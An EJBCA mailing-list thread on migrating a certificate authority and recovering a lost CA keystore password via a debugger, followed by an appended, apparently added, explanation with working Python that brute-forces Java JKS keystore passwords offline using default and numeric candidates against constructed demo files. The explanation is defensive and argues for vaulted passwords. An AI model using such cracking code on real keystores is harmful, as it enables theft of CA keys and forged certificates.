From: Tomas G. <to...@pr...> - 2013-04-17 06:08:56

Ah cool, then they had at least thought about not using the default password in the original installation :)

On 04/17/2013 01:01 PM, Duarte Silva wrote:
> No, the problem was that it wasn't the default password (foo123), at least
> not for the root CA and sub CA used to sign the certificates. The conf
> directory only had the sample files (remember that the system was
> installed as a PoC but in the end was used in production pffffff). For
> the more curious, the password used was 05813... I don't even know where
> that comes from :P
>
> Later I figured out that I was lucky that the CAs were in auto
> activation, otherwise when I restarted JBoss the password would have
> been lost. I could also have checked the database for the pin'ed
> password (I don't know where it is saved though) but in the end, I still
> would have to deobfuscate it.
>
> I will propose to management that in the new system, the administration
> CA is the only one that will use the password on file; the signing CA and
> sub CA will use a different password each that will be stored in a
> vault, and they won't be in auto activation mode. If for some reason the
> physical server or JBoss gets restarted, a recovery process will have to
> be followed where access to the passwords/CAs needs to be approved.
>
> If the server gets owned they will still have to use it to create fake
> certs (unless they know what to search for in the process memory)
> instead of just extracting the CAs and using them externally. It's
> about time to harden things up :)
>
> On 17 Apr 2013 00:41, "Tomas Gustavsson" <to...@pr...> wrote:
> > An impressive demonstration of Java skills!
> >
> > You were probably using the default keystore password.
> > So the other, even simpler option, would have been to look in the file
> > conf/ejbca.properties, where it is configured :-)
> >
> > If you require non-configured passwords in the future you can use CA
> > passwords that are not configured in any file, so you have to activate
> > your CAs manually with a password if you restart JBoss.
> >
> > I hope you will consider contributing to EJBCA in the future, people
> > with debugging skills are always needed :-)
> >
> > Cheers,
> > Tomas
> >
> > On 04/17/2013 12:46 AM, Duarte Silva wrote:
> > > I was able to recover the CA keystore password
> > >
> > > I downloaded the source code for EJBCA version 3.8.0 and after grep'ing around
> > > I found the function loadKeystore(..., String keystorepass) in the class
> > > SoftCAToken.
> > >
> > > Then I decided to import the code into Eclipse, start JBoss in debug mode with
> > > the Eclipse debugger attached, a breakpoint in that function and bam, instant
> > > password recovery!!
> > >
> > > In the end the password itself would be easily cracked by a brute-force attack,
> > > but the way I did it has so much more style eheheh :P
> > >
> > > Best regards,
> > > Duarte Silva
> > >
> > > On Tuesday 16 April 2013 08:41:00 Tomas Gustavsson wrote:
> > > > There are always alternatives...
> > > >
> > > > I think you have many options depending on how much you know about
> > > > databases, or Java programming etc. And how much time/money you want to
> > > > spend.
> > > >
> > > > If you want to migrate to another database:
> > > >
> > > > You can write a program to export database contents and import into
> > > > another database. You can find HSQLDB tools (don't know if there are
> > > > any?) to SQL dump the database contents to import into another database.
> > > > Or you can export the CAs and individual certificates to file (if not
> > > > too many) and import it all in a new installation using the EJBCA CLI.
> > > >
> > > > PrimeKey has some tools for the common criteria certified version of
> > > > EJBCA, EJBCA 5, that can be used to migrate between databases.
> > > >
> > > > Cheers,
> > > > Tomas
> > > >
> > > > On 04/15/2013 09:28 PM, Duarte Silva wrote:
> > > > > Hi David,
> > > > >
> > > > > the answer I was afraid of, especially because the older version
> > > > > installation is using a HSQLDB. There aren't any passwords defined in the
> > > > > config files and it's been a long time, I don't even remember what I
> > > > > ate yesterday :|
> > > > >
> > > > > Is there an alternative way of exporting every CA and bulk exporting the
> > > > > entities to then re-import them in the new installation?
> > > > >
> > > > > Best regards,
> > > > > Duarte Silva
> > > > >
> > > > > On Monday 15 April 2013 14:51:00 David CARELLA wrote:
> > > > > > Hi Duarte,
> > > > > >
> > > > > > You can see the documentation in EJBCA_HOME/doc/RELEASE_NOTES and
> > > > > > UPGRADE for information about upgrading from an earlier version of EJBCA.
> > > > > >
> > > > > > To upgrade from 3.8.0, you will need to upgrade from 3.8.0 to 3.11.x,
> > > > > > then from 3.11.x to 4.0.14.
> > > > > >
> > > > > > Cheers,
> > > > > > David Carella
> > > > > >
> > > > > > On 04/15/2013 01:48 PM, Duarte Silva wrote:
> > > > > > > Hi all,
> > > > > > >
> > > > > > > I have been using EJBCA since 2008, it is an old version (3.8.0) and at
> > > > > > > the time the way the installation was done wasn't the smartest. Now I'm
> > > > > > > trying to migrate the old system to the new version of EJBCA.
> > > > > > >
> > > > > > > I have installed the new version in a proper manner (with an actual
> > > > > > > database and so on) in a different machine and I'm now trying to migrate
> > > > > > > the CAs and Entities to the newly created system.
> > > > > > >
> > > > > > > What's the best approach to do this migration?
> > > > > > >
> > > > > > > Thanks in advance,
> > > > > > > Duarte Silva
> > > > > > >
> > > > > > > ------------------------------------------------------------------------------
> > > > > > > Precog is a next-generation analytics platform capable of advanced
> > > > > > > analytics on semi-structured data. The platform includes APIs for
> > > > > > > building apps and a phenomenal toolset for data science. Developers can
> > > > > > > use our toolset for easy data analysis & visualization. Get a free
> > > > > > > account! http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > > > > _______________________________________________
> > > > > > > Ejbca-develop mailing list
> > > > > > > Ejb...@li...
> > > > > > > https://lists.sourceforge.net/lists/listinfo/ejbca-develop
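Duarte's remark in the thread that the recovered keystore password "would be easily cracked by a brute-force attack" is worth making concrete, because it is the reason the thread ends with CAs taken out of auto-activation and given individual vaulted passwords. The block below is an added example, not code from the thread, from EJBCA or from PrimeKey. The thread does not say which keystore format the SoftCAToken held; the example uses the JKS format because its integrity check (SHA-1 over the UTF-16BE password, the fixed string "Mighty Aphrodite" and the keystore body) can be implemented from the Python standard library, so a candidate password can be verified without parsing or decrypting any entry. The keystore image, its password and the candidate list are constructed for the demo; the only value taken from the thread is the sample default `foo123`, which is tried first.

```python
"""Offline password recovery against a Java JKS keystore (added example).

Verifying a JKS store password needs only the trailing SHA-1 integrity
digest, so an attacker who has copied the keystore file (or the soft CA
token blob) can test candidates at hash speed without touching the CA.
"""
import hashlib
import itertools
import struct
from typing import Iterable, Optional

JKS_MAGIC = 0xFEEDFEED
JKS_VERSION = 2
# Fixed string that sun.security.provider.JavaKeyStore mixes into the digest.
JKS_DIGEST_SALT = b"Mighty Aphrodite"


def jks_keyed_digest(password: str, body: bytes) -> bytes:
    """SHA-1(password as UTF-16BE || "Mighty Aphrodite" || body)."""
    md = hashlib.sha1()
    md.update(password.encode("utf-16-be"))  # Java writes each char big-endian
    md.update(JKS_DIGEST_SALT)
    md.update(body)
    return md.digest()


def build_jks(password: str, entries: bytes = b"", count: int = 0) -> bytes:
    """Build a minimal JKS image: header, entries, trailing integrity digest.

    Constructed test data. With no entries this is still a structurally
    valid (empty) keystore, which is all the password check needs.
    """
    body = struct.pack(">III", JKS_MAGIC, JKS_VERSION, count) + entries
    return body + jks_keyed_digest(password, body)


def check_jks_password(store: bytes, password: str) -> bool:
    """True if `password` reproduces the keystore's integrity digest."""
    if len(store) < 12 + 20:
        raise ValueError("too short to be a JKS keystore")
    magic, version = struct.unpack(">II", store[:8])
    if magic != JKS_MAGIC or version not in (1, 2):
        raise ValueError("not a JKS keystore")
    body, digest = store[:-20], store[-20:]
    return jks_keyed_digest(password, body) == digest


def candidate_passwords(digit_len: int = 5) -> Iterable[str]:
    """Sample default from the thread first, then every numeric string of
    digit_len digits (10**digit_len candidates, a fraction of a second)."""
    yield "foo123"
    for digits in itertools.product("0123456789", repeat=digit_len):
        yield "".join(digits)


def brute_force_jks(store: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate that verifies against `store`, else None."""
    for pw in candidates:
        if check_jks_password(store, pw):
            return pw
    return None


if __name__ == "__main__":
    # Constructed 5-digit password; not the one mentioned in the thread.
    store = build_jks("27182")
    print("recovered:", brute_force_jks(store, candidate_passwords()))
    # A store protected by a long random password from a vault does not fall
    # to this loop, which is the point of the hardening proposed above.
    print("vaulted:", brute_force_jks(build_jks("Zq9!xL-v7Kp#2"), candidate_passwords()))
```

Note what the check does not need: no private key is decrypted and no entry is parsed, so the cost per candidate is one SHA-1 over the file. That is why a password taken from a sample config, or a short numeric one, protects a copied soft CA token for about as long as it takes to read this paragraph, whereas a CA that is not auto-activated and whose activation password lives only in a vault forces an attacker who owns the server to misuse the running instance (or dig the password out of process memory) instead of walking off with the CA.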